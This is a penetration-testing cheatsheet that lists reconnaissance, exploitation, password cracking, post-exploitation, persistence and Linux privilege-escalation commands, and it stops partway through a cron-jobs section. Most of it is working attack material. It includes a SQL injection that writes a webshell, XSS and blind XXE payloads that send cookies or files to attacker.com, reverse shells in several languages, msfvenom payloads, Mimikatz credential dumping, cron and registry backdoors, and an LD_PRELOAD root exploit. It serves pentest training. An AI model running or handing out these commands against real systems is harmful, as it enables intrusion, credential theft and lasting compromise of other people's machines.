Disclaimer: This cheatsheet is for authorised penetration testing and educational purposes only. Never use these techniques against systems you do not own or have explicit written permission to test.
Table of Contents
- OSINT & Recon
- Google Dorks
- Scanning & Enumeration
- Web Exploitation
- Network Exploitation
- Password Attacks
- Wordlists
- Post Exploitation
- Privilege Escalation — Linux
- Privilege Escalation — Windows
- Active Directory
- Pivoting & Tunnelling
OSINT & Recon
Passive DNS & Domain Recon
# WHOIS lookup — registrar, registration dates, contact info
whois target.com
# DNS enumeration — A, MX, NS, TXT records
dig target.com ANY
dig target.com MX
dig target.com TXT
# Reverse DNS lookup
dig -x 192.168.1.1
# Zone transfer attempt (often fails but always worth trying)
dig axfr @ns1.target.com target.com
# DNSrecon — comprehensive DNS enumeration
dnsrecon -d target.com -t std
dnsrecon -d target.com -t axfr # zone transfer
dnsrecon -d target.com -t brt -D /usr/share/wordlists/dnsmap.txt # brute force subdomains
Subdomain Enumeration
# Sublist3r — passive subdomain enumeration via OSINT sources
sublist3r -d target.com
sublist3r -d target.com -o subdomains.txt
# Amass — thorough active and passive subdomain discovery
amass enum -d target.com
amass enum -active -d target.com -o amass_out.txt
# assetfinder — fast passive recon
assetfinder --subs-only target.com
# crt.sh — certificate transparency logs
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq '.[].name_value' | sort -u
# Subfinder — fast passive subdomain discovery
subfinder -d target.com -o subfinder_out.txt
# ffuf — brute force subdomains using DNS wordlist
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u http://FUZZ.target.com -mc 200,301,302
Email & Employee Recon
# theHarvester — emails, subdomains, and hosts from public sources
theHarvester -d target.com -b all
theHarvester -d target.com -b google,linkedin,shodan
# Hunter.io (browser) — discover email format used at a company
# https://hunter.io/search/target.com
# Google dork — find employees on LinkedIn
# site:linkedin.com "target company" "engineer"
Shodan & Censys
# Shodan CLI — search for internet-exposed assets
shodan search 'org:"Target Company"'
shodan search 'hostname:target.com'
shodan search 'ssl.cert.subject.cn:target.com'
shodan host 192.168.1.1 # detailed info on a specific IP
# Useful Shodan filters
# port:22 org:"Target"
# product:"Apache httpd" country:"GB"
# http.title:"Dashboard" org:"Target"
Wayback Machine & Historical Recon
# gau — fetch all known URLs for a domain from various archives
gau target.com
gau target.com | grep "\.js$" # filter for JavaScript files
gau target.com | grep "\.php$" # filter for PHP endpoints
# waybackurls — pull historical URLs from the Wayback Machine
waybackurls target.com | tee wayback.txt
# Always check robots.txt and sitemap — often reveals hidden paths
curl https://target.com/robots.txt
curl https://target.com/sitemap.xml
Google Dorks
# Find login portals
site:target.com inurl:login
site:target.com inurl:admin
site:target.com intitle:"Login"
# Find exposed files by extension
site:target.com ext:pdf
site:target.com ext:xls OR ext:xlsx
site:target.com ext:sql
site:target.com ext:log
site:target.com ext:bak OR ext:backup
site:target.com ext:env
site:target.com ext:config
# Find open directory listings
site:target.com intitle:"index of"
site:target.com intitle:"index of /" "parent directory"
# Find sensitive info in exposed files
site:target.com "password" filetype:log
site:target.com "DB_PASSWORD" ext:env
site:target.com intext:"api_key" OR intext:"api key"
# Find config and source files
site:target.com ext:xml intext:"password"
site:target.com filetype:conf
site:target.com filetype:ini
# Search GitHub and Pastebin for leaks
site:github.com "target.com" password
site:pastebin.com "target.com"
# Find verbose error messages that reveal tech stack
site:target.com "SQL syntax"
site:target.com "Warning: mysql_"
site:target.com "Uncaught exception"
# Find exposed webcams and devices
inurl:/view/index.shtml # Axis cameras
intitle:"webcamXP 5"
intitle:"D-Link" inurl:8080
# Other useful combos
intitle:"admin panel" site:target.com
inurl:"phpinfo.php" site:target.com
inurl:"/wp-admin/" site:target.com
Scanning & Enumeration
Nmap
# Quick scan — top 1000 ports with service and script detection
nmap -sV -sC 10.10.10.1
# Full port scan — all 65535 ports
nmap -p- 10.10.10.1
# Stealth SYN scan with OS and version detection
nmap -sS -sV -O -Pn 10.10.10.1
# Aggressive scan — version, scripts, OS, and traceroute (noisy)
nmap -A 10.10.10.1
# UDP scan — slow but reveals SNMP, DNS, and other UDP services
nmap -sU --top-ports 100 10.10.10.1
# Ping sweep — discover live hosts on a subnet
nmap -sn 10.10.10.0/24
# Output to all formats (normal, XML, grepable)
nmap -sV -oA scan_results 10.10.10.1
# Run a specific NSE script
nmap --script=http-enum 10.10.10.1
nmap --script=smb-vuln* 10.10.10.1
nmap --script=ftp-anon 10.10.10.1
# Firewall evasion techniques
nmap -f 10.10.10.1 # fragment packets
nmap -D RND:10 10.10.10.1 # decoy scan with random IPs
nmap --source-port 53 10.10.10.1 # spoof source port as DNS
Service-Specific Enumeration
FTP (21)
# Attempt anonymous login
ftp 10.10.10.1
# Username: anonymous / Password: (blank or any email)
# Nmap scripts — check for anonymous access and vulnerabilities
nmap --script=ftp-anon,ftp-bounce,ftp-syst 10.10.10.1
# Brute force FTP credentials
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.1
SSH (22)
# Banner grab — reveals exact version
nc -v 10.10.10.1 22
# Check which authentication methods are supported
ssh -v user@10.10.10.1
# Brute force SSH credentials
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.1
hydra -L users.txt -P passwords.txt ssh://10.10.10.1
# Connect with a private key
ssh -i id_rsa user@10.10.10.1
SMTP (25)
# Connect and attempt user enumeration via VRFY / EXPN
nc -v 10.10.10.1 25
VRFY root
EXPN admin
# smtp-user-enum — automated SMTP user enumeration
smtp-user-enum -M VRFY -U users.txt -t 10.10.10.1
DNS (53)
# Zone transfer attempt — dumps all DNS records if misconfigured
dig axfr @10.10.10.1 target.com
# Reverse lookup
dig -x 10.10.10.1 @10.10.10.1
# Brute force DNS records
dnsenum --dnsserver 10.10.10.1 --enum target.com
SMB (139/445)
# List shares anonymously
smbclient -L //10.10.10.1 -N
smbmap -H 10.10.10.1
# Connect to a share
smbclient //10.10.10.1/share -N # null session
smbclient //10.10.10.1/share -U username # with credentials
# enum4linux / enum4linux-ng — full SMB/RPC enumeration
enum4linux -a 10.10.10.1
enum4linux-ng -A 10.10.10.1
# Nmap SMB scripts
nmap --script=smb-enum-shares,smb-enum-users 10.10.10.1
nmap --script=smb-vuln* 10.10.10.1 # check for EternalBlue etc.
# NetExec (replaces CrackMapExec)
netexec smb 10.10.10.1
netexec smb 10.10.10.1 -u user -p password --shares
SNMP (161 UDP)
# Walk the full MIB using the default community string
snmpwalk -v2c -c public 10.10.10.1
snmpwalk -v1 -c public 10.10.10.1 1.3.6.1.2.1.1.5.0 # retrieve hostname only
# Brute force community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt 10.10.10.1
# snmp-check — cleaner, more readable SNMP output
snmp-check 10.10.10.1 -c public
LDAP (389)
# Anonymous bind — enumerate without credentials
ldapsearch -x -H ldap://10.10.10.1 -b "dc=target,dc=com"
ldapsearch -x -H ldap://10.10.10.1 -b "dc=target,dc=com" "(objectClass=*)"
# Authenticated LDAP query
ldapsearch -x -H ldap://10.10.10.1 -D "cn=admin,dc=target,dc=com" \
-w password -b "dc=target,dc=com"
Web Enumeration
# gobuster — directory brute force
gobuster dir -u http://10.10.10.1 \
-w /usr/share/seclists/Discovery/Web-Content/common.txt
# gobuster — virtual host brute force (find subdomains served by the same IP)
gobuster vhost -u "https://target.com" \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \
--append-domain --no-tls-validation
# ffuf — directory brute force
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-u http://10.10.10.1/FUZZ -mc 200,301,302,403
# ffuf — virtual host brute force (find subdomains via Host header fuzzing)
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-H "Host: FUZZ.target.com" -u http://10.10.10.1 -mc 200,301
# feroxbuster — recursive directory brute force
feroxbuster -u http://10.10.10.1 -w /usr/share/wordlists/dirb/common.txt
# Technology fingerprinting — identify the stack before attacking it
whatweb http://10.10.10.1
# Nikto — automated web vulnerability scanner
nikto -h http://10.10.10.1
# ffuf — brute force hidden GET parameters
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-u http://10.10.10.1/page?FUZZ=test -mc 200 -fs <baseline_size>
# ffuf — fuzz parameter values (e.g. find valid user IDs)
ffuf -w /usr/share/wordlists/rockyou.txt \
-u "http://10.10.10.1/page?id=FUZZ" -mc 200 -fs <baseline_size>
# ffuf — fuzz POST body parameters
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-u http://10.10.10.1/login -X POST -d "FUZZ=test" \
-H "Content-Type: application/x-www-form-urlencoded" -mc 200
# ffuf — fuzz file extensions to find backup or alternate files
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt \
-u http://10.10.10.1/indexFUZZ -mc 200
# ffuf — authenticated directory brute force using a session cookie
ffuf -w wordlist.txt -u http://10.10.10.1/FUZZ \
-H "Cookie: session=abc123" -mc 200,301,302
Web Exploitation
SQL Injection
# Manual detection — inject into parameters and observe response changes
' OR 1=1-- -
' OR '1'='1
" OR "1"="1
') OR ('1'='1
# sqlmap — automated SQL injection detection and exploitation
sqlmap -u "http://target.com/page?id=1"
sqlmap -u "http://target.com/page?id=1" --dbs # list databases
sqlmap -u "http://target.com/page?id=1" -D dbname --tables # list tables in a DB
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump # dump a table
# sqlmap against a POST login form
sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
# sqlmap with session cookie (authenticated endpoint)
sqlmap -u "http://target.com/page" --cookie="session=abc123"
# sqlmap from a saved Burp Suite request file
sqlmap -r request.txt
# Boolean-based blind injection — compare true vs false responses
' AND 1=1-- - # true condition
' AND 1=2-- - # false condition — response differs
# Determine column count for UNION injection
' ORDER BY 1-- - # increment until error
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT 1,2,3-- -
# MySQL — read a file from the server (requires FILE privilege)
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL-- -
# MySQL — write a webshell (requires write access to web root)
' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -
Cross-Site Scripting (XSS)
# Basic reflected XSS payloads — test in all input fields and URL parameters
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
# Cookie stealing — exfiltrate session cookies to attacker server
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
# Filter bypass payloads
<ScRiPt>alert(1)</ScRiPt>
<script>alert`1`</script>
<iframe src="javascript:alert(1)">
"><script>alert(1)</script>
'><script>alert(1)</script>
File Inclusion
# Local File Inclusion (LFI) — read arbitrary files on the server
?page=../../../../etc/passwd
?file=....//....//....//etc/passwd # bypass ../ filter
?lang=php://filter/convert.base64-encode/resource=index.php # read PHP source as base64
# LFI to RCE via log poisoning
# 1. Inject PHP into the User-Agent header so it gets written to the access log:
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
# 2. Include the log file to trigger execution:
?page=/var/log/apache2/access.log&cmd=id
# LFI to RCE via /proc/self/environ (older servers)
?page=/proc/self/environ&cmd=id
# Remote File Inclusion (RFI) — load and execute a remote file
?page=http://attacker.com/shell.php
# PHP wrappers for advanced LFI
?page=php://input # POST raw PHP code in request body
?page=data://text/plain,<?php system('id'); ?>
?page=expect://id
Command Injection
# Basic injection characters — try all of these in input fields
; id
| id
|| id
&& id
`id`
$(id)
# Bypass space filters
cat${IFS}/etc/passwd # $IFS acts as a space
cat</etc/passwd
# Bypass character blacklists
w'h'o'am'i # break up the command with quotes
/bin/c?t /etc/passwd # use wildcards
$(printf "\x77\x68\x6f\x61\x6d\x69") # hex encode the command
SSRF
SSRF (Server-Side Request Forgery) tricks the server into making HTTP requests on your behalf. Look for parameters that accept URLs or hostnames — url=, redirect=, fetch=, src=, path= etc. The goal is to reach internal services the server can talk to but you can’t directly.
# Target localhost to access internal-only services
url=http://localhost/admin
url=http://127.0.0.1:22 # probe internal ports — different response = port open
url=http://127.0.0.1:3306 # MySQL
url=http://127.0.0.1:6379 # Redis (often unauthenticated internally)
# Cloud metadata endpoints — extremely high value on AWS/GCP/Azure
url=http://169.254.169.254/latest/meta-data/ # AWS metadata
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ # AWS IAM keys
url=http://metadata.google.internal/computeMetadata/v1/ # GCP metadata
url=http://169.254.169.254/metadata/instance?api-version=2021-02-01 # Azure metadata
# Bypass filters that blacklist "127.0.0.1" or "localhost" as strings
url=http://2130706433/ # 127.0.0.1 as a decimal integer
url=http://0x7f000001/ # 127.0.0.1 as hex
url=http://127.1/ # shorthand notation
url=http://[::1]/ # IPv6 loopback
url=http://localtest.me/ # DNS that resolves to 127.0.0.1
# Use SSRF to probe the internal network
url=http://192.168.1.1/
url=http://10.0.0.1:8080/admin
XXE
XXE (XML External Entity Injection) exploits XML parsers that process external entity declarations. When an app accepts XML input — SOAP requests, file uploads, API payloads — and the parser has external entities enabled, you can use it to read local files, probe internal services, or exfiltrate data out-of-band. Look for Content-Type: application/xml or text/xml in requests, and any file upload that accepts XML, SVG, DOCX, or XLSX formats.
<!-- Basic XXE — read a local file. Contents of /etc/passwd returned wherever &xxe; is rendered -->
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<!-- SSRF via XXE — make the server reach an internal endpoint -->
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>
<!-- Blind XXE via Out-of-Band — when nothing is reflected in the response.
The server fetches your malicious DTD, which exfiltrates file contents to your server. -->
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root>&exfil;</root>
<!-- evil.dtd hosted on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfiltrate "<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%exfiltrate;
<!-- XXE via SVG file upload — rename a crafted SVG and upload it -->
<?xml version="1.0"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg>&xxe;</svg>
Network Exploitation
Metasploit
# Start Metasploit
msfconsole
# Search for modules by platform and type
search type:exploit platform:windows smb
search type:exploit platform:linux http
# Use a module and set required options
use exploit/path/to/module
show options
set RHOSTS 10.10.10.1
set LHOST 10.10.14.5
set LPORT 4444
run
# Common payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set PAYLOAD linux/x86/meterpreter/reverse_tcp
# Generate standalone payloads with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf
msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.php
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f powershell
Reverse Shells
# Start a netcat listener on your machine first
nc -lvnp 4444
# Bash reverse shell
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PHP reverse shell
php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# PowerShell reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Netcat reverse shell (where -e is supported)
nc -e /bin/sh 10.10.14.5 4444
# Netcat reverse shell (without -e, using mkfifo)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f
# Upgrade a basic shell to a fully interactive TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then: Ctrl+Z → stty raw -echo; fg → press Enter → export TERM=xterm
Responder — LLMNR/NBT-NS Poisoning
# Start Responder to capture NTLMv2 hashes on the local network
responder -I eth0 -rdwv
# Crack captured NTLMv2 hashes offline with hashcat
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
Meterpreter
Once you have a Meterpreter shell via Metasploit, these are the commands you’ll reach for most:
# Core info gathering
sysinfo # OS, hostname, architecture
getuid # current user
getpid # current process ID
ps # list running processes
shell # drop into a system shell
# File operations
upload /local/file.exe C:\\Windows\\Temp\\file.exe
download C:\\Users\\user\\Desktop\\flag.txt /tmp/
ls
cd C:\\Users
cat file.txt
# Privilege escalation
getsystem # attempt automatic privesc via token impersonation
getuid # confirm if now SYSTEM
# Pivoting into internal networks
run autoroute -s 192.168.1.0/24 # add route to internal subnet
portfwd add -l 8080 -p 80 -r 192.168.1.10 # forward a remote port to localhost
# Useful post-exploitation modules
run post/windows/gather/hashdump # dump local account hashes
run post/multi/recon/local_exploit_suggester # suggest local privesc exploits
run post/windows/manage/migrate # migrate to a more stable process
# Session management
background # background the current session
sessions -l # list all active sessions
sessions -i 1 # interact with session 1
Password Attacks
Wordlist Generation
# CeWL — generate a custom wordlist by crawling the target website
cewl http://target.com -d 3 -m 5 -w wordlist.txt
# Crunch — generate wordlists by character set and pattern
crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt
crunch 6 6 -t @@@@%% -o wordlist.txt # 4 letters + 2 digits
# CUPP — generate targeted personal wordlists (names, birthdays, pets etc.)
cupp -i
Online Brute Force
# Hydra — versatile brute forcer supporting many protocols
hydra -l admin -P rockyou.txt http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
hydra -l root -P rockyou.txt ssh://10.10.10.1
hydra -L users.txt -P rockyou.txt ftp://10.10.10.1
hydra -l admin -P rockyou.txt 10.10.10.1 smb
# Medusa — alternative to Hydra
medusa -h 10.10.10.1 -u admin -P rockyou.txt -M http -m DIR:/admin
Offline Hash Cracking
# Hashcat — GPU-accelerated hash cracking
hashcat -m 0 hashes.txt rockyou.txt # MD5
hashcat -m 100 hashes.txt rockyou.txt # SHA1
hashcat -m 1800 hashes.txt rockyou.txt # sha512crypt (Linux /etc/shadow $6$)
hashcat -m 1000 hashes.txt rockyou.txt # NTLM (Windows)
hashcat -m 5600 hashes.txt rockyou.txt # NTLMv2 (captured via Responder)
hashcat -m 13100 hashes.txt rockyou.txt # Kerberoast (TGS ticket)
hashcat -m 18200 hashes.txt rockyou.txt # AS-REP Roasting hash
# Rules-based cracking — applies mutations (capitalise, append numbers etc.)
hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# John the Ripper
john hashes.txt --wordlist=rockyou.txt
john hashes.txt --wordlist=rockyou.txt --rules
john --format=NT hashes.txt --wordlist=rockyou.txt
# Extract hashes from various file types for offline cracking
pdf2john file.pdf > hash.txt
zip2john file.zip > hash.txt
ssh2john id_rsa > hash.txt
keepass2john vault.kdbx > hash.txt
Hash Identification
# hashid — identify hash type from format
hashid 'hash_here'
# Quick reference by length and prefix
# 32 chars → MD5
# 40 chars → SHA1
# 64 chars → SHA256
# $1$ → MD5crypt
# $2a$/$2b$ → bcrypt
# $6$ → sha512crypt
Wordlists
A quick reference for which wordlists to reach for in common scenarios.
Passwords
| Wordlist | Use case |
|---|---|
/usr/share/wordlists/rockyou.txt |
General purpose password cracking — the go-to |
/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt |
Quick spray — top 10k common passwords |
/usr/share/seclists/Passwords/Default-Credentials/default-passwords.csv |
Default credentials for devices and services |
/usr/share/seclists/Passwords/Leaked-Databases/ |
Leaked database wordlists |
Usernames
| Wordlist | Use case |
|---|---|
/usr/share/seclists/Usernames/Names/names.txt |
General username enumeration |
/usr/share/seclists/Usernames/top-usernames-shortlist.txt |
Quick spray — common admin usernames |
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt |
Large-scale username brute force |
Web Directory Brute Force
| Wordlist | Use case |
|---|---|
/usr/share/seclists/Discovery/Web-Content/common.txt |
Fast general directory scan |
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt |
Medium thoroughness — good balance |
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt |
Thorough — slower, more coverage |
/usr/share/wordlists/dirb/common.txt |
Lightweight dirb wordlist |
/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt |
File discovery (not just directories) |
/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt |
Parameter name fuzzing |
Subdomain / DNS Brute Force
| Wordlist | Use case |
|---|---|
/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt |
Fast subdomain scan — top 5k |
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt |
Thorough subdomain scan |
/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt |
Alternative large subdomain list |
SNMP Community Strings
| Wordlist | Use case |
|---|---|
/usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt |
Brute force SNMP community strings |
Post Exploitation
Situational Awareness
# Linux
id && whoami # current user and group memberships
hostname # machine name
uname -a # kernel version and architecture
cat /etc/os-release # OS name and version
env # all environment variables — look for creds, paths, tokens
ip a # network interfaces and IP addresses
netstat -tulpn # listening and established network connections with PIDs
ss -tulpn # same as netstat but faster and more modern
ps aux # all running processes — look for interesting services running as root
cat /etc/passwd # all local user accounts
cat /etc/hosts # local DNS overrides — reveals internal hostnames
cat /etc/crontab # scheduled tasks — common privesc vector
ls -la /home/ # list home directories — reveals other users on the system
# Windows
whoami # current user
whoami /priv # assigned privileges — look for SeImpersonatePrivilege etc.
whoami /groups # group memberships — look for interesting groups
hostname # machine name
systeminfo # OS version, architecture, patch level, and domain info
net user # list all local user accounts
net localgroup administrators # who has local admin rights
ipconfig /all # network interfaces, IP, DNS, and DHCP info
netstat -ano # active connections and listening ports with PIDs
tasklist # running processes — look for AV, EDR, and interesting services
wmic product get name,version # installed software and versions
File Transfer
# Serve files from your attack machine
python3 -m http.server 80
# Download on Linux target
wget http://10.10.14.5/file.sh
curl http://10.10.14.5/file.sh -o file.sh
# Download on Windows target
certutil -urlcache -split -f http://10.10.14.5/file.exe file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/file.exe','file.exe')"
iwr http://10.10.14.5/file.exe -OutFile file.exe
# SCP — copy files over SSH
scp file.txt user@10.10.10.1:/tmp/
scp user@10.10.10.1:/etc/passwd ./passwd
# SMB server on attacker (impacket) — useful when HTTP is blocked
python3 /usr/share/impacket/examples/smbserver.py share . -smb2support
# On Windows target:
copy \\10.10.14.5\share\file.exe .
Automated Enumeration Downloads
# LinPEAS — Linux privilege escalation enumeration
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
# WinPEAS — Windows privilege escalation enumeration
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEAS.bat
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe
# LinEnum — additional Linux enumeration script
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# Linux Exploit Suggester — maps kernel version to known exploits
wget https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh
# PowerUp — Windows privilege escalation via PowerSploit
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
# SharpHound — Active Directory data collection for BloodHound
wget https://github.com/BloodHoundAD/SharpHound/releases/latest/download/SharpHound.exe
# Chisel — TCP tunnelling over HTTP for port forwarding
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz
wget https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_windows_amd64.gz
# Rubeus — Kerberos abuse toolkit
wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
# Mimikatz — Windows credential dumping
wget https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
Credential Hunting
# Linux — search for stored credentials in config and history files
find / -name "*.conf" 2>/dev/null | xargs grep -l "password"
find / -name "*.env" 2>/dev/null
find / -name "id_rsa" 2>/dev/null
find / -name "*.kdbx" 2>/dev/null
cat ~/.bash_history
cat ~/.ssh/config
grep -r "password" /var/www/ 2>/dev/null
grep -r "DB_PASS" /var/www/ 2>/dev/null
# Windows — search for credentials in files and registry
dir /s /b *pass* *cred* *vnc* *.config* 2>nul
findstr /si "password" *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" # autologon credentials
# Dump Windows credentials with Mimikatz (requires SYSTEM or admin)
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords # dump plaintext passwords from LSASS
lsadump::sam # dump SAM database hashes
lsadump::secrets # dump LSA secrets
# Dump credentials remotely via impacket
python3 secretsdump.py domain/user:password@10.10.10.1
Database Access
# MySQL — interactive and one-liner access
mysql -u root -p
mysql -u root -p'password' -e "show databases;"
mysql -u root -p -h 10.10.10.1 # remote connection
# MySQL — useful commands once inside
show databases;
use dbname;
show tables;
select * from users;
select user,password from mysql.user; # dump MySQL user hashes
select load_file('/etc/passwd'); # read files (requires FILE privilege)
# MSSQL via impacket
python3 mssqlclient.py domain/user:password@10.10.10.1 -windows-auth
python3 mssqlclient.py user:password@10.10.10.1
# MSSQL — useful commands once inside
SELECT name FROM master.dbo.sysdatabases; # list all databases
USE dbname; SELECT * FROM INFORMATION_SCHEMA.TABLES;
EXEC xp_cmdshell 'whoami'; # RCE if xp_cmdshell is enabled
EXEC sp_configure 'show advanced options',1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; # enable xp_cmdshell
# PostgreSQL
psql -U postgres -h 10.10.10.1
# PostgreSQL — useful commands once inside
\list # list databases
\c dbname # connect to a database
\dt # list tables
SELECT * FROM users;
COPY (SELECT '') TO PROGRAM 'id'; # RCE via COPY TO PROGRAM
Cracking /etc/shadow
# Combine /etc/passwd and /etc/shadow into a single crackable file
unshadow /etc/passwd /etc/shadow > hashes.txt
# Crack with John
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Identify the hash type and crack with hashcat
hashid '$6$salt$hash...' # $6$ = sha512crypt
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt # sha512crypt
hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt # md5crypt ($1$)
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt # bcrypt ($2b$)
Persistence
# Linux — add a cron job reverse shell
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'" >> /etc/crontab
# Linux — add your SSH public key for persistent access
mkdir ~/.ssh && echo "ssh-rsa AAAA...yourkey..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Windows — add a registry run key to execute on login
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\backdoor.exe"
# Windows — create a scheduled task to run as SYSTEM
schtasks /create /tn "backdoor" /tr "C:\backdoor.exe" /sc onlogon /ru System
Privilege Escalation — Linux
Automated Enumeration
# LinPEAS — comprehensive Linux privesc enumeration
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh
# LinEnum
chmod +x LinEnum.sh && ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
# Linux Exploit Suggester — maps current kernel to known exploits
chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh
# linux-smart-enumeration — level 2 for thorough output
chmod +x lse.sh && ./lse.sh -l 2
SUID / SGID Binaries
# Find all SUID binaries on the system
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Find all SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Check GTFOBins for how to exploit any binary you find — https://gtfobins.github.io
# Common exploitable SUID binaries:
find . -exec /bin/sh \; -quit # /usr/bin/find
vim -c ':py import os; os.execl("/bin/sh","sh")' # /usr/bin/vim
bash -p # /bin/bash with SUID
python -c 'import os; os.execl("/bin/sh","sh")' # /usr/bin/python
Sudo
# Check what commands you can run with sudo
sudo -l
# Common sudo privesc paths:
sudo vim -c ':!/bin/bash' # vim
sudo find / -exec /bin/bash \; -quit # find
sudo python3 -c 'import os; os.system("/bin/bash")' # python3
sudo less /etc/passwd # less → type !bash
# LD_PRELOAD abuse (if env_keep+=LD_PRELOAD is set in sudo -l)
cat > /tmp/pe.c << EOF
#include <stdio.h>
#include <stdlib.h>
void _init() { setuid(0); system("/bin/bash"); }
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/pe.so /tmp/pe.c
sudo LD_PRELOAD=/tmp/pe.so <any_allowed_sudo_binary>
Cron Jobs
# View all cron jobs
cat /etc/crontab
ls -la /etc/cron*
crontab -l
# If a cron script is world-writable — append a reverse shell
